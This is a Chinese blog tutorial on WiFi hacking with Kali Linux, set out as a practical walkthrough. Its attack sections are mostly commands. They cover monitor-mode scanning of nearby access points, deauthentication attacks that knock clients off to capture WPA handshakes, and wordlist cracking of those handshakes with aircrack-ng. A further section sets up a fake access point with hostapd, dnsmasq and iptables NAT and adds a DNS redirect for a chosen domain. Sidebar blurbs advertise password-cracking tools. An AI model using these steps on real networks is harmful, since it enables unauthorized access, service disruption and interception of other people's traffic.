WIFI 黑客实战

最新推荐文章于 2024-06-12 17:16:39 发布
最新推荐文章于 2024-06-12 17:16:39 发布
阅读量1.3k 收藏 8
点赞数 1
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K_K__K/article/details/104319357
版权

一、 基础知识篇

1、

2、kali 中有关 WIFI 的相关命令

        2.1  ifconfig - 用来查看、配置、启用或禁用网络接口的工具

                    参数介绍:http://linux.51yip.com/search/ifconfig

        2.2  route - 用来对路由表进行操作,包括添加修改删除路由项

                    参数介绍:http://linux.51yip.com/search/route

        2.3  iwconfig - 系统配置无线网络设配或显示无线网络设备信息

                    参数介绍:http://linux.51yip.com/search/iwconfig

        2.4  iw - 新的基于 nl80211 的用于无线设备的CLI配置实用程序

                   参数介绍:http://www.voidcn.com/article/p-wtevzqwu-gm.html

        2.5  iwlist - 用于对/proc/net/wireless文件进行分析,得出无线网卡相关信息

                   参数介绍:https://www.cnblogs.com/liuliu-word/p/9646060.html

3、 

二、工具篇

1、 air*-ng 家族

        1.1  airmon-ng 用来改变无线网卡工作模式

        1.2  airodump-ng 用来捕获802.11数据报文

 

        1.3  aireplay-ng 在进行抓包时,可以根据需求创建特殊的无线网络数据报文及流量

 

 

        1.4  aircrack-ng 收集到足够的数据包后,可以自动检测数据包并判断是否可以破解

        1.5  airserv-ng 将无线网卡连接至某一特定端口,为攻击时灵活调用做准备

 

        1.6  airolib-ng 进行WPA Rainbow Table攻击时使用,用来建立特定数据库文件

 

        1.7  airdecap-ng 用来解开处于加密状态的数据包

                                                                         

        1.8  airbase-ng 用来构建虚拟 AP

                                                                        

        1.9  airdriver-ng

 

        1.10  airtun-ng

 

 

三、实践篇

1、利用 airmon-ng 家族实现 wifi 密码(WPA)破解

    1.1 实验工具

               VMware 虚拟机中运行的 kali系统、Ralink RT3070 无线网卡

    1.2 实验步骤

          1.2.1  在虚拟机中加载无线网卡

          1.2.2  在kali中加载无线网卡并且将无线网卡改为混杂模式

               查看无线网卡信息可以用 iwconfig 、ifconfig 命令   如下图

iwconfig
iwconfig
 ifconfig

              调为混杂模式  使用命令 airmon-ng  start  [参数 外部网卡名称 wlan0 ]

        1.2.3  使用 airodump-ng 命令查找附近 AP 信息

                 airodump-ng  [ 参数 将外部网卡调整成混杂模式后网卡名称 (可以通过ifconfig命令查看)  mon0 ]

airodump-ng  mon0

                  注意上图红框标的参数   BSSID -- AP的MAC地址    CH -- AP的传输频道   ENC -- AP使用的安全模式

                                                         ESSID -- AP的名称

          1.2.4  使用 airodump-ng 命令抓取AP的握手包 <一直打开抓包,直到抓到握手包>

airodump-ng  -w  cap [数据包名称  自己起的]  mon0  

           1.2.5  使用 aireplay-ng 发起deauthenticate攻击,加速获得握手包

aireplay-ng  -0 10  -a  [AP的BSSID]  -e [AP的ESSID] -c [连接AP终端的BSSID] mon0

                      获取连接AP终端信息 如下图所示

airodump-ng  --bssid  [被破解AP的BSSID]  mon0

              1.2.6  若抓到握手包,则取消 1.2.4 还在运行的 airodump-ng 抓包

                       [ 问 ]  如何知道抓到握手包了那 ?

                       [ 答 ]  可以通过 aircrack-ng  [参数  保存数据包的文件 *.cap]

kali 自动把保存数据包的文件进行编号  格式 <自己起的文件名>-<序号>.cap
aircrack-ng  wpa-01.cap

               1.2.7  利用 aircrack-ng 破解握手包

                           需要一个强大的密码本 [ 若密码本中有AP的密码才会破解出来,否则将不会成功 ]

aircrack-ng  -w  [ 密码本 wordlist.txt ]  [ 握手包  wpa-01.cap]

 

 2、利用 kismet 探查 AP 信息

      2.1  kismet 工具界面

             命令行键入 kismet

            选 OK

             选 YES

                 选 Start

                 选 YES  添加  source

                填入  网卡名称  选 Add

                  点击右下角,进入华 (zhuang) 丽 (bi) 的界面

          2.2  kismet 可以嗅探附近 AP 信息

                   关闭 kismet 后,系统会自动生成五个文件 ,分别为 Kismet-[ 运行时间 ]-1.alert  / Kismet-[ 运行时间 ]-1.gpsxml

                   Kismet-[ 运行时间 ]-1.nettxt  /  Kismet-[ 运行时间 ]-1.netxml  /  Kismet-[ 运行时间 ]-1.pcapdump

                  *.alert : 包含运行中的警告信息    *.gpsxml : 如果使用了GPS源,则相关的GPS数据保存在该文件中

                 *.nettxt : 包括所有收集的文本输出信息   *.netxml : 包括所有XML格式的数据    *.pacpdump : 抓取到的所有数据包

*.nettxt

 

*.netxml

 

 3、创建虚假AP并且实施DNS静态分析

          3.1 配置环境

                      1>  安装 hostapd 和 dnsmasq 软件

                            sudo apt-get install hostapd

                            sudo apt-get install dnsmasq

                       2> 开启外置网卡,并设置信息

                             ipconfig wlan0 up 10.0.0.1 netmask 255.255.255.0

                       3> 开启转发模式

                              echo 1 > /proc/sys/net/ipv4/ip_forward

          3.2 配置hostapd和dnsmasq的.conf文件

hostapd.conf
hostapd.conf

           

dnsmasq.conf

          3.3 设置防火墙规则

                      1>  sudo iptables -F

                      2>  sudo iptables -t nat -F

                      3>  sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

                      4>  sudo iptables -A FORWARD -i wlan0 -j ACCEPT

          3.4 开启服务

                      1>  dnsmasq

                       由于 nl80211 驱动程序存在一些漏洞,所以需要执行下列命令

                             >  nmcli  radio  wifi  off

                             >  rfkill  unblock  wlan

                             >  ip   link  set  dev  wlan0  up

                      2>  hostapd /etc/hostapd/hostapd.conf

                      <注> 如果无法开启dnsmasq服务,则需要ps aux | grep 'dnsmasq',并且 kill dnsmasq,再尝试启动。

          3.5 连接,并且测试 

                      > 成功访问百度首页,即实验成功...

         3.6 设置DNS静态解析

                     在 dnsmasq.conf 文件中添加 address=/test.com/10.0.0.1,表示用户访问域名为 test.com的网站时,DNS将其解析为10.0.0.1

         3.7 验证结果

                     用户访问 www.test.com ,定向解析到10.0.0.1/index.html文件,实验成功...

四、疑问篇

 

走向风口的一头猪
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WiFi密码新攻击破解方法,黑客攻破只需10秒
w3cschools的博客
08-08 2万+
  近日,中国知名黑客安全组织东方联盟研究人员透露了一种新的WiFi黑客技术,使黑客更容易破解大多数现代路由器的WiFi密码,并且攻破只需要10秒,速度非常快。   方法是利用由流行的密码破解工具Hashcat,东方联盟研究人员发现,新的WiFihack明确地针对WPA/WPA2无线网络协议,启用了基于成对主密钥标识符(PMKID)的漫游功能。   在分析新推出的WPA3安全标准时,东方联...
黑客攻击系统之功能实现
qq_51331560的博客
09-04 190
黑客攻击系统之功能实现
wifi-hacker:使用内置Kali工具攻击无线连接的Shell脚本。 支持所有证券(WEP,WPS,WPA,WPA2)
05-11
使用内置Kali工具攻击无线连接的Shell脚本。 支持所有证券(WEP,WPS,WPA,WPA2)
10款最佳免费WiFi黑客工具(附传送门)
最新发布
weixin_51725318的博客
06-12 709
10款最佳免费WiFi黑客工具(附传送门)
推荐开源项目:WiFi-Hacker - 网络安全检测工具
gitblog_00056的博客
05-16 473
推荐开源项目:WiFi-Hacker - 网络安全检测工具 项目地址:https://gitcode.com/TermuxHackz/wifi-hacker 1、项目介绍 WiFi-Hacker 是一个基于Kali Linux内置工具的Shell脚本,专门设计用于测试和攻击无线网络连接。这个开源项目不仅适用于网络安全专业人士,也适合对黑客攻防感兴趣的初学者。只需简单的命令行操作,就能针对各种安全协...
10款最佳免费WiFi黑客工具(附传送门)(1),2024年最新网络安全面试送分题
2401_83945851的博客
04-17 1305
这款以亚当和夏娃的儿子命名的工具,可以使用不同的方法来识别密码,例如网络包嗅探,也可以执行暴力算法、字典攻击以及密码分析等。但是,网络安全并不是一个简单的行业,光靠一个人看书是不行的,为了给真正想学习网络安全的朋友提供一个高效、专业、系统的学习模式,马哥教育经过调研走访安全大厂,精心设计了《网络安全工程师》的系统学习课程。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
黑客十大工具之美
游戏开发、游戏引擎开发、逆向破解爱好者
08-29 1322
如今,随着用户友好型黑客工具的不断涌现,黑客攻击已经不再仅是网络专家或专业人士所独具的特殊技能,这种黑客艺术也可以轻松地为普通用户所用。大多数人都想要了解最好的免费WiFi黑客工具,以学习在智能手机和台式机上进行黑客攻击。 尽管网络上有许许多多黑客攻击教程,但黑客攻击并不是那么容易学的。它不是一蹴而就的事情,需要深入的研究和奉献精神才能够成为专家。 但是,通过一些免费可用的黑客工具来...
黑客命令行攻防实战详解
08-07
该书从兴趣、心态、知识、技能四大方面,以及程序语言、电脑硬件、操作系统、密码学、社会工程学、网络通信六大基础起步,让所有读者都能深入理解黑客技术并利用它们来保护电脑正常运行和数据安全。
黑客命令行攻防实战详解》
08-06
黑客命令行攻防实战详解》
黑客攻防实战
12-27
攻击基本原理与防范技术据统计,在所有黑客攻击事件中,SYN攻击是最常见又最容易被利用的一种攻击手法。相信很多人还记得2000年YAHOO网站遭受的攻击事例,当时黑客利用的就是简单而有效的SYN攻击,有些网络蠕虫病毒...
网络安全最全10款最佳免费WiFi黑客工具(附传送门)(1),2024年最新2024年网络安全工作或许更难找
2401_84300255的博客
05-09 1515
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
wifi hacker
10-11
Get passwd for wep and wap
【最详细】Wireshark使用教程
热门推荐
未名编程
07-18 3万+
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 原理步骤1.安装2.wireshark使用3.先看几个数据包,熟悉一下wireshark4.wireshark过滤规则4.1 地址过滤4.2 端口过滤4.4 其他常用过滤5.流查看6.数据包保存说明总结 原理 wireshark是一款网络嗅探工具。可以监视网络的状态、数据流动情况以及网络上传输的信息。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式,便可以将网上传输的源源.
无线WiFi安全渗透与攻防(四)之kismet的使用
A_991128a的博客
03-16 955
Kismet是802.11二层无线网络探测器,嗅探器和入侵检测系统。它将与支持原始监视(rfmon)模式中的任何无线网卡的工作,并能嗅出的802.11a /b / g / n的流量。它可以使用其他程序来播放音频警报网络事件,读出网络摘要,或提供GPS坐标。这是包含芯,客户端和服务器的主包。
超详细的 Wireshark 使用教程
ss810540895的博客
12-14 7008
菜单栏:用于调试、配置工具栏:常用功能的快捷方式过滤栏:指定过滤条件,过滤数据包数据包列表:核心区域,每一行就是一个数据包数据包详情:数据包的详细数据数据包字节:数据包对应的字节流,二进制说明:数据包列表区中不同的协议使用了不同的颜色区分。协议颜色标识定位在菜单栏 视图 --> 着色规则。如下所示WireShark 主要分为这几个界面。
八款流行无线黑客工具,非常实用
libaiup的博客
09-21 2969
1、AircrackAircrack是最受欢迎的无线密码破解工具之一,可用于802.11a / b / g WEP和WPA破解。Aircrack使用的算法是通过捕获数据包来恢复无线密码。收集到足够的数据包后,它会尝试恢复密码。为了使攻击更快,它通过一些优化实现标准的FMS攻击。该工具背后的公司还提供一个在线教程,您可以在其中学习如何安装和使用此工具来破解无线密码。它来自Linux发行版,并提供Live CD和VMWare镜像选项。您可以使用其中任何一种。它支持大多数无线适配器,基本都保证可以使用。
无线攻击 --aircrack-ng套件之一:Airtun-NG(虚拟隧道接口创建者)
Kevin's Blog
03-06 995
文章目录一、用法概述二、命令格式三、用法示例3.1 监视接入点以及WEP密钥 一、用法概述   Airtun-NG是一个虚拟隧道接口创建工具,属于aircrack-ng套件,Airtun-NG两个基本功能为: 监视所有加密流量以实现wIDS(无线入侵检测系统) 将任意流量注入网络 (要执行wIDS收集,必须具有要见是的网络的加密密钥和BSSID) 二、命令格式 三、用法示例 3.1 监视接...
2019无线WIFI 黑客渗透工具TOP 5
向晨的博客
02-28 1万+
Aircrack- ng Aircrack- ng是目前最流行的WiFi密码破解工具。 它侧重于WiFi安全的不同领域,监控:数据包捕获和数据导出到文本文件,以供第三方工具进一步处理,攻击:通过数据包注入重播攻击,解除身份验证虚假接入点等,测试:检查WiFi卡和驱动程序功能(捕获和注入),破解:WEP和WPA PSK(WPA 1和2)。 Wireshark WireShark是当下非常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值